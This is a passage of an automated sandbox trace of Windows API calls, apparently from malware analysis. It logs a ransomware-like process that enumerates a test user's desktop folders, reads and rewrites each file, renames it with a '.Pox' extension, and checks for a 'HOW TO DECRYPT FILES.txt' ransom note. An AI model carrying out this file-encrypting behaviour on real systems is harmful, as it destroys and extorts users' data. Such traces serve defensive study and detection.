nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", lpFilePart=0x0) returned 0x3c [0037.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yjbkop66pa6 t9xa78.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.907] GetFileType (hFile=0x26c) returned 0x1 [0037.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.907] GetFileType (hFile=0x26c) returned 0x1 [0037.907] WriteFile (in: hFile=0x26c, lpBuffer=0x2423f50*, nNumberOfBytesToWrite=0xaf80, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2423f50*, lpNumberOfBytesWritten=0x3ae564*=0xaf80, lpOverlapped=0x0) returned 1 [0037.909] CloseHandle (hObject=0x26c) returned 1 [0037.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", lpFilePart=0x0) returned 0x3c [0037.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp.Pox", lpFilePart=0x0) returned 0x40 [0037.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yjbkop66pa6 t9xa78.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d476b0, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x17a50f70, ftLastAccessTime.dwHighDateTime=0x1d4c7ad, ftLastWriteTime.dwLowDateTime=0x28c69d20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xaf80)) returned 1 [0037.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.911] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yjbkop66pa6 t9xa78.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yjbkop66pa6 t9xa78.bmp.pox")) returned 1 [0037.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", lpFilePart=0x0) returned 0x3b [0037.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr4fkdmgsj24kipo8.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.912] GetFileType (hFile=0x26c) returned 0x1 [0037.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.912] GetFileType (hFile=0x26c) returned 0x1 [0037.912] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x44af [0037.912] ReadFile (in: hFile=0x26c, lpBuffer=0x242f470, nNumberOfBytesToRead=0x44af, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x242f470*, lpNumberOfBytesRead=0x3ae570*=0x44af, lpOverlapped=0x0) returned 1 [0037.913] CloseHandle (hObject=0x26c) returned 1 [0037.927] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.927] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", lpFilePart=0x0) returned 0x3b [0037.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr4fkdmgsj24kipo8.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.928] GetFileType (hFile=0x26c) returned 0x1 [0037.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.928] GetFileType (hFile=0x26c) returned 0x1 [0037.928] WriteFile (in: hFile=0x26c, lpBuffer=0x2491b28*, nNumberOfBytesToWrite=0x44b0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2491b28*, lpNumberOfBytesWritten=0x3ae564*=0x44b0, lpOverlapped=0x0) returned 1 [0037.929] CloseHandle (hObject=0x26c) returned 1 [0037.930] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt", lpFilePart=0x0) returned 0x3b [0037.930] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt.Pox", lpFilePart=0x0) returned 0x3f [0037.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.930] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr4fkdmgsj24kipo8.odt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5d7a0, ftCreationTime.dwHighDateTime=0x1d4cabf, ftLastAccessTime.dwLowDateTime=0xe356290, ftLastAccessTime.dwHighDateTime=0x1d4c650, ftLastWriteTime.dwLowDateTime=0x28cb5fe0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x44b0)) returned 1 [0037.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.930] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr4fkdmgsj24kipo8.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZR4FkDMgSj24KiPo8.odt.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr4fkdmgsj24kipo8.odt.pox")) returned 1 [0037.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0037.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", lpFilePart=0x0) returned 0x2e [0037.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", lpFilePart=0x0) returned 0x2f [0037.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406048 [0037.931] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183b50, ftCreationTime.dwHighDateTime=0x1d4ca85, ftLastAccessTime.dwLowDateTime=0xcc2df290, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0xcc2df290, ftLastWriteTime.dwHighDateTime=0x1d4c69f, nFileSizeHigh=0x0, nFileSizeLow=0x17b26, dwReserved0=0x0, dwReserved1=0x0, cFileName="62iXFu5VPwWKjK9YrtO.avi", cAlternateFileName="62IXFU~1.AVI")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbcbcf0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0xb013b20, ftLastAccessTime.dwHighDateTime=0x1d4cecb, ftLastWriteTime.dwLowDateTime=0xb013b20, ftLastWriteTime.dwHighDateTime=0x1d4cecb, nFileSizeHigh=0x0, nFileSizeLow=0x8593, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ifNF.swf", cAlternateFileName="")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f82b2c0, ftCreationTime.dwHighDateTime=0x1d4ca10, ftLastAccessTime.dwLowDateTime=0x555a1930, ftLastAccessTime.dwHighDateTime=0x1d4ccd7, ftLastWriteTime.dwLowDateTime=0x555a1930, ftLastWriteTime.dwHighDateTime=0x1d4ccd7, nFileSizeHigh=0x0, nFileSizeLow=0x11c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="F1tHsbysnX3JElKgeY.m4a", cAlternateFileName="F1THSB~1.M4A")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca8a140, ftCreationTime.dwHighDateTime=0x1d4c562, ftLastAccessTime.dwLowDateTime=0x9f1d8a70, ftLastAccessTime.dwHighDateTime=0x1d4c6c4, ftLastWriteTime.dwLowDateTime=0x9f1d8a70, ftLastWriteTime.dwHighDateTime=0x1d4c6c4, nFileSizeHigh=0x0, nFileSizeLow=0x16862, dwReserved0=0x0, dwReserved1=0x0, cFileName="FGmRZRKbhxJ.wav", cAlternateFileName="FGMRZR~1.WAV")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6af891f0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx", cAlternateFileName="QUMYXX~1.XLS")) returned 1 [0037.932] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0037.932] FindClose (in: hFindFile=0x406048 | out: hFindFile=0x406048) returned 1 [0037.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0037.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0037.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0037.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-", lpFilePart=0x0) returned 0x2e [0037.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\", lpFilePart=0x0) returned 0x2f [0037.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406048 [0037.933] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.933] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183b50, ftCreationTime.dwHighDateTime=0x1d4ca85, ftLastAccessTime.dwLowDateTime=0xcc2df290, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0xcc2df290, ftLastWriteTime.dwHighDateTime=0x1d4c69f, nFileSizeHigh=0x0, nFileSizeLow=0x17b26, dwReserved0=0x0, dwReserved1=0x0, cFileName="62iXFu5VPwWKjK9YrtO.avi", cAlternateFileName="62IXFU~1.AVI")) returned 1 [0037.933] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbcbcf0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0xb013b20, ftLastAccessTime.dwHighDateTime=0x1d4cecb, ftLastWriteTime.dwLowDateTime=0xb013b20, ftLastWriteTime.dwHighDateTime=0x1d4cecb, nFileSizeHigh=0x0, nFileSizeLow=0x8593, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ifNF.swf", cAlternateFileName="")) returned 1 [0037.933] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f82b2c0, ftCreationTime.dwHighDateTime=0x1d4ca10, ftLastAccessTime.dwLowDateTime=0x555a1930, ftLastAccessTime.dwHighDateTime=0x1d4ccd7, ftLastWriteTime.dwLowDateTime=0x555a1930, ftLastWriteTime.dwHighDateTime=0x1d4ccd7, nFileSizeHigh=0x0, nFileSizeLow=0x11c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="F1tHsbysnX3JElKgeY.m4a", cAlternateFileName="F1THSB~1.M4A")) returned 1 [0037.934] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca8a140, ftCreationTime.dwHighDateTime=0x1d4c562, ftLastAccessTime.dwLowDateTime=0x9f1d8a70, ftLastAccessTime.dwHighDateTime=0x1d4c6c4, ftLastWriteTime.dwLowDateTime=0x9f1d8a70, ftLastWriteTime.dwHighDateTime=0x1d4c6c4, nFileSizeHigh=0x0, nFileSizeLow=0x16862, dwReserved0=0x0, dwReserved1=0x0, cFileName="FGmRZRKbhxJ.wav", cAlternateFileName="FGMRZR~1.WAV")) returned 1 [0037.934] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6af891f0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx", cAlternateFileName="QUMYXX~1.XLS")) returned 1 [0037.934] FindNextFileW (in: hFindFile=0x406048, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4f4c10, ftCreationTime.dwHighDateTime=0x1d4d00a, ftLastAccessTime.dwLowDateTime=0x6af891f0, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0x6af891f0, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="qumyxXz YiQpNxh4shD.xlsx", cAlternateFileName="QUMYXX~1.XLS")) returned 0 [0037.934] FindClose (in: hFindFile=0x406048 | out: hFindFile=0x406048) returned 1 [0037.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0037.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0037.934] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", lpFilePart=0x0) returned 0x46 [0037.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0037.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\62ixfu5vpwwkjk9yrto.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.935] GetFileType (hFile=0x26c) returned 0x1 [0037.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0037.935] GetFileType (hFile=0x26c) returned 0x1 [0037.935] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x17b26 [0037.935] ReadFile (in: hFile=0x26c, lpBuffer=0x355dfe0, nNumberOfBytesToRead=0x17b26, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x355dfe0*, lpNumberOfBytesRead=0x3ae4fc*=0x17b26, lpOverlapped=0x0) returned 1 [0037.938] CloseHandle (hObject=0x26c) returned 1 [0037.959] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0037.959] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0037.959] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", lpFilePart=0x0) returned 0x46 [0037.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0037.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\62ixfu5vpwwkjk9yrto.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.960] GetFileType (hFile=0x26c) returned 0x1 [0037.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0037.961] GetFileType (hFile=0x26c) returned 0x1 [0037.961] WriteFile (in: hFile=0x26c, lpBuffer=0x35d4808*, nNumberOfBytesToWrite=0x17b30, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x35d4808*, lpNumberOfBytesWritten=0x3ae4f0*=0x17b30, lpOverlapped=0x0) returned 1 [0037.963] CloseHandle (hObject=0x26c) returned 1 [0037.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi", lpFilePart=0x0) returned 0x46 [0037.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi.Pox", lpFilePart=0x0) returned 0x4a [0037.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0037.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T9ZgHii-\\62iXFu5VPwWKjK9YrtO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t9zghii-\\62ixfu5vpwwkjk9yrto.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183b50, ftCreationTime.dwHighDateTime=0x1d4ca85, ftLastAccessTime.dwLowDateTime=0xcc2df290, ftLastAccessTime.dwHighDateTime=0x1d4c69f, ftLastWriteTime.dwLowDateTime=0x28d022a0, ftLastWriteTime.dwHighDateTime=0x1d53803, 